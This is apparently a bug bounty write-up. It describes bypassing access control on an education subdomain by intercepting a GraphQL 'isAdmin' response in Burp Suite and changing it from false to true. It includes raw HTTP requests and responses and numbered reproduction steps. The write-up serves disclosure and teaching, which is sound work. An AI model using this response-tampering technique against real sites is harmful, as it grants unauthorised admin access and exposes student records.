As-Salaam-Alaikum.(Peace be upon you).

I am back with another writeup I hope you Guys are hunting and earning bounty. This Time I was able to access Admin panel with the help of graphql. let’s start.

I am taking target.com as an example for this writeup. I was testing one by one subdomain of target.com and i come to this subdomain education.target.com. This is some kind of Education page where student can login and see the lecture.

Attack

When I login in as normal user I see the page where login function and student education page is available I open my burp suite and refresh the page to see what are the request made to the server. After that is see that graphql request is made for some reason to api endpoint .

request

POST /api/graphql HTTP/1.1Host: education.target.com
                                                                           User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/91.0
Accept: */*Cookie: a0:state=YOUR Cookie{"operationName":"isAdmin","variables":{},"query":"query isAdmin {\n  isAdmin\n}\n"}

I Right Click on that request -> Do intercept -> response to this Request in burp suite

Response

HTTP/1.1 200 OK
Server: nginx/1.19.1
Date: Sat, 04 Sep 2021 04:47:05 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 27
Connection: close
access-control-allow-origin: *
access-control-allow-credentials: true
etag: W/"1b-fPOq3WJkZQ0rkaalpPwLwZziKSQ"
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15724800; includeSubDomains
{"data":{"isAdmin":false}} <-- I just change this to this -> isAdmin":true

And I am able to access the admin panel. there I can add lectures and see the all-student list.

1. Go to This URL education.target.com
2. Login with your credential :
3. After That Refresh the page and capture the request in burp suite forward every request until you see this request :

POST /api/graphql HTTP/1.1Host: education.target.com
                                                                           User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/91.0
Accept: */*Cookie: a0:state=YOUR Cookie{"operationName":"isAdmin","variables":{},"query":"query isAdmin {\n  isAdmin\n}\n"}

4. Right Click on that request -> Do intercept -> response to this Request

5. After that you will see this response in Your Burp Suite :

HTTP/1.1 200 OK
Server: nginx/1.19.1
Date: Sat, 04 Sep 2021 04:47:05 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 27
Connection: close
access-control-allow-origin: *
access-control-allow-credentials: true
etag: W/"1b-fPOq3WJkZQ0rkaalpPwLwZziKSQ"
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15724800; includeSubDomains
{"data":{"isAdmin":false}}

6. Change “isAdmin: false to “isAdmin: true” and send that request

7. Back to your browser You will see the admin panel on your home page.

The main vulnerability lies in graphql. Just because of misconfiguration in graphql implementation an attacker was able to access the admin panel.

Always check each and every request on the login page especially graphql page.

I am not attaching a screenshot of the admin panel page because of company privacy.